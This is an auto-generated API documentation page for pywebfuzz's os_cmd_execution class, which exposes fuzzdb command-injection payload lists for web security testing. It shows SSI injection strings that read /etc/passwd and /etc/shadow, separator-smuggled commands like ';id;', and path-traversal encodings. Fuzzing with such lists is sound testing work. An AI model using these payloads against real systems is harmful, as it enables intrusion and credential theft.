<?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
          "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
  <title>pywebfuzz.fuzzdb.attack_payloads.os_cmd_execution</title>
  <link rel="stylesheet" href="epydoc.css" type="text/css" />
  <script type="text/javascript" src="epydoc.js"></script>
</head>

<body bgcolor="white" text="black" link="blue" vlink="#204080"
      alink="#204080">
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
       bgcolor="#a0c0ff" cellspacing="0">
  <tr valign="middle">
  <!-- Home link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="pywebfuzz-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Tree link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Index link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Help link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th>

      <th class="navbar" width="100%"></th>
  </tr>
</table>
<table width="100%" cellpadding="0" cellspacing="0">
  <tr valign="top">
    <td width="100%">
      <span class="breadcrumbs">
        <a href="pywebfuzz-module.html">Package&nbsp;pywebfuzz</a> ::
        <a href="pywebfuzz.fuzzdb-module.html">Module&nbsp;fuzzdb</a> ::
        <a href="pywebfuzz.fuzzdb.attack_payloads-class.html">Class&nbsp;attack_payloads</a> ::
        Class&nbsp;os_cmd_execution
      </span>
    </td>
    <td>
      <table cellpadding="0" cellspacing="0">
        <!-- hide/show private -->
        <tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink"
    onclick="toggle_private();">hide&nbsp;private</a>]</span></td></tr>
        <tr><td align="right"><span class="options"
            >[<a href="frames.html" target="_top">frames</a
            >]&nbsp;|&nbsp;<a href="pywebfuzz.fuzzdb.attack_payloads.os_cmd_execution-class.html"
            target="_top">no&nbsp;frames</a>]</span></td></tr>
      </table>
    </td>
  </tr>
</table>
<!-- ==================== CLASS DESCRIPTION ==================== -->
<h1 class="epydoc">Class os_cmd_execution</h1><p class="nomargin-top"></p>
<p>This implements the os-command-execution payloads from fuzzdb</p>

<!-- ==================== CLASS VARIABLES ==================== -->
<a name="section-ClassVariables"></a>
<table class="summary" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
  <td colspan="2" class="table-header">
    <table border="0" cellpadding="0" cellspacing="0" width="100%">
      <tr valign="top">
        <td align="left"><span class="table-header">Class Variables</span></td>
        <td align="right" valign="top"
         ><span class="options">[<a href="#section-ClassVariables"
         class="privatelink" onclick="toggle_private();"
         >hide private</a>]</span></td>
      </tr>
    </table>
  </td>
</tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.os_cmd_execution-class.html#command_execution_unix" class="summary-name">command_execution_unix</a> = <code title="['&amp;lt;!--#exec%20cmd=&amp;quot;/bin/cat%20/etc/passwd&amp;quot;--&amp;gt;',
 '&amp;lt;!--#exec%20cmd=&amp;quot;/bin/cat%20/etc/shadow&amp;quot;--&amp;gt;',
 '&amp;lt;!--#exec%20cmd=&amp;quot;/usr/bin/id;--&amp;gt;',
 '&amp;lt;!--#exec%20cmd=&amp;quot;/usr/bin/id;--&amp;gt;',
 '/index.html|id|',
 ';id;',
 ';id',
 ';netstat -a;',
..."><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">&amp;lt;!--#exec%20cmd=&amp;quot;/bin/cat%2</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.os_cmd_execution-class.html#commands_unix" class="summary-name">commands_unix</a> = <code title="['uname -n -s',
 'whoami',
 'pwd',
 'last',
 'cat /etc/passwd',
 'ls -la /tmp',
 'ls -la /home',
 'ping -i 30 127.0.0.1',
..."><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">uname -n -s</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">whoami</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">pwd</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">last</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">cat </code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a name="commands_windows"></a><span class="summary-name">commands_windows</span> = <code title="['ver', 'chdir', 'echo %USERNAME%']"><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">ver</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">chdir</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">echo %USERNAME%</code><code class="variable-quote">'</code><code class="variable-group">]</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.os_cmd_execution-class.html#LinuxCommands" class="summary-name">LinuxCommands</a> = <code title="['accept',
 'access',
 'aclocal',
 'aconnect',
 'acpi',
 'acpi_available',
 'acpid',
 'addr2line',
..."><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">accept</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">access</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">aclocal</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">aconnect</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">a</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.os_cmd_execution-class.html#OSXCommands" class="summary-name">OSXCommands</a> = <code title="['alias',
 'alloc',
 'apropos',
 'awk',
 'basename',
 'bash',
 'bg',
 'bind',
..."><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">alias</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">alloc</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">apropos</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">awk</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">basename</code><code class="variable-quote">'</code><code class="variable-op">,</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.os_cmd_execution-class.html#source_disc_cmd_exec_traversal" class="summary-name">source_disc_cmd_exec_traversal</a> = <code title="['..%255c',
 '.%5c../..%5c',
 '/..%c0%9v../',
 '/..%c0%af../',
 '/..%255c..%255c',
 '']"><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">..%255c</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">.%5c../..%5c</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.os_cmd_execution-class.html#location" class="summary-name">location</a> = <code title="'/data/attack-payloads/os-cmd-execution/WindowsPowershell.fuzz.txt'"><code class="variable-quote">'</code><code class="variable-string">/data/attack-payloads/os-cmd-execution/WindowsPowe</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
<tr>
    <td width="15%" align="right" valign="top" class="summary">
      <span class="summary-type">&nbsp;</span>
    </td><td class="summary">
        <a href="pywebfuzz.fuzzdb.attack_payloads.os_cmd_execution-class.html#WindowsCommands" class="summary-name">WindowsCommands</a> = <code title="['get-acl',
 'set-acl',
 'get-alias',
 'import-alias',
 'new-alias',
 'set-alias',
 'get-authenticodesignature',
 'set-authenticodesignature',
..."><code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">get-acl</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">set-acl</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">get-alias</code><code class="variable-quote">'</code><code class="variable-op">, </code><code class="variable-quote">'</code><code class="variable-string">import-</code><code class="variable-ellipsis">...</code></code>
    </td>
  </tr>
</table>
<!-- ==================== CLASS VARIABLE DETAILS ==================== -->
<a name="section-ClassVariableDetails"></a>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
  <td colspan="2" class="table-header">
    <table border="0" cellpadding="0" cellspacing="0" width="100%">
      <tr valign="top">
        <td align="left"><span class="table-header">Class Variable Details</span></td>
        <td align="right" valign="top"
         ><span class="options">[<a href="#section-ClassVariableDetails"
         class="privatelink" onclick="toggle_private();"
         >hide private</a>]</span></td>
      </tr>
    </table>
  </td>
</tr>
</table>
<a name="command_execution_unix"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">command_execution_unix</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">&amp;lt;!--#exec%20cmd=&amp;quot;/bin/cat%20/etc/passwd&amp;quot;--&amp;gt;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">&amp;lt;!--#exec%20cmd=&amp;quot;/bin/cat%20/etc/shadow&amp;quot;--&amp;gt;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">&amp;lt;!--#exec%20cmd=&amp;quot;/usr/bin/id;--&amp;gt;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">&amp;lt;!--#exec%20cmd=&amp;quot;/usr/bin/id;--&amp;gt;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">/index.html|id|</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">;id;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">;id</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">;netstat -a;</code><code class="variable-quote">'</code><code class="variable-op">,</code>
<code class="variable-ellipsis">...</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<a name="commands_unix"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">commands_unix</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">uname -n -s</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">whoami</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">pwd</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">last</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">cat /etc/passwd</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">ls -la /tmp</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">ls -la /home</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">ping -i 30 127.0.0.1</code><code class="variable-quote">'</code><code class="variable-op">,</code>
<code class="variable-ellipsis">...</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<a name="LinuxCommands"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">LinuxCommands</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">accept</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">access</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">aclocal</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">aconnect</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">acpi</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">acpi_available</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">acpid</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">addr2line</code><code class="variable-quote">'</code><code class="variable-op">,</code>
<code class="variable-ellipsis">...</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<a name="OSXCommands"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">OSXCommands</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">alias</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">alloc</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">apropos</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">awk</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">basename</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">bash</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">bg</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">bind</code><code class="variable-quote">'</code><code class="variable-op">,</code>
<code class="variable-ellipsis">...</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<a name="source_disc_cmd_exec_traversal"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">source_disc_cmd_exec_traversal</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">..%255c</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">.%5c../..%5c</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">/..%c0%9v../</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">/..%c0%af../</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">/..%255c..%255c</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string"></code><code class="variable-quote">'</code><code class="variable-group">]</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<a name="location"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">location</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-quote">'</code><code class="variable-string">/data/attack-payloads/os-cmd-execution/WindowsPowershell.fuzz.txt</code><code class="variable-quote">'</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<a name="WindowsCommands"></a>
<div>
<table class="details" border="1" cellpadding="3"
       cellspacing="0" width="100%" bgcolor="white">
<tr><td>
  <h3 class="epydoc">WindowsCommands</h3>
  
  <dl class="fields">
  </dl>
  <dl class="fields">
    <dt>Value:</dt>
      <dd><table><tr><td><pre class="variable">
<code class="variable-group">[</code><code class="variable-quote">'</code><code class="variable-string">get-acl</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">set-acl</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">get-alias</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">import-alias</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">new-alias</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">set-alias</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">get-authenticodesignature</code><code class="variable-quote">'</code><code class="variable-op">,</code>
 <code class="variable-quote">'</code><code class="variable-string">set-authenticodesignature</code><code class="variable-quote">'</code><code class="variable-op">,</code>
<code class="variable-ellipsis">...</code>
</pre></td></tr></table>
</dd>
  </dl>
</td></tr></table>
</div>
<br />
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
       bgcolor="#a0c0ff" cellspacing="0">
  <tr valign="middle">
  <!-- Home link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="pywebfuzz-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Tree link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Index link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th>

  <!-- Help link -->
      <th>&nbsp;&nbsp;&nbsp;<a
        href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th>

      <th class="navbar" width="100%"></th>
  </tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" width="100%%">
  <tr>
    <td align="left" class="footer">
    Generated by Epydoc 3.0.1 on Wed Oct 20 23:04:09 2010
    </td>
    <td align="right" class="footer">
      <a target="mainFrame" href="http://epydoc.sourceforge.net"
        >http://epydoc.sourceforge.net</a>
    </td>
  </tr>
</table>

<script type="text/javascript">
  <!--
  // Private objects are initially displayed (because if
  // javascript is turned off then we want them to be
  // visible); but by default, we want to hide them.  So hide
  // them unless we have a cookie that says to show them.
  checkCookie();
  // -->
</script>
</body>
</html>
